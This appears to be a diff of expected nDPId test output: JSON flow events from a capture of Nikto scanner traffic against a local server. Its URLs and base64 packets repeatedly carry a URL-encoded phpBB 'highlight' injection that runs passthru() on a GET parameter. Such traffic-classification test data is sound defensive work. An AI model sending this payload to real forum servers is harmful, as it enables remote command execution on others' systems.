{"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277758,"pkt":"AAAAAAAAAAAAAAAACABFAAFmwkJAAEAGeU1\/AAABfwAAAcbAH5DScvtgYIpbaYAYAED\/WgAAAQEICp1m\/yadZv8mR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCg0K"} 
-01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277760,"pkt":"AAAAAAAAAAAAAAAACABFAAFkSaBAAEAG8fF\/AAABfwAAAcbCH5CzknC\/qWQ1toAYAED\/WAAAAQEICp1m\/yidZv8oR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} 
-01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277762,"pkt":"AAAAAAAAAAAAAAAACABFAAFkl59AAEAGo\/J\/AAABfwAAAcbEH5DhFa6+6BKXhoAYAED\/WAAAAQEICp1m\/yqdZv8qR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} 
-01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277764,"pkt":"AAAAAAAAAAAAAAAACABFAAFdzxpAAEAGbH5\/AAABfwAAAcbGH5DgufY6a2RlI4AYAED\/UQAAAQEICp1m\/yydZv8sR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCg0K"} 
-01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277766,"pkt":"AAAAAAAAAAAAAAAACABFAAFm3WVAAEAGXip\/AAABfwAAAcbIH5DcNuRDgHH2c4AYAED\/WgAAAQEICp1m\/y2dZv8tR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277767,"pkt":"AAAAAAAAAAAAAAAACABFAAFrfdxAAEAGva5\/AAABfwAAAcbKH5Cyd0T8zDk2q4AYAED\/XwAAAQEICp1m\/y+dZv8vR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} 
-01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 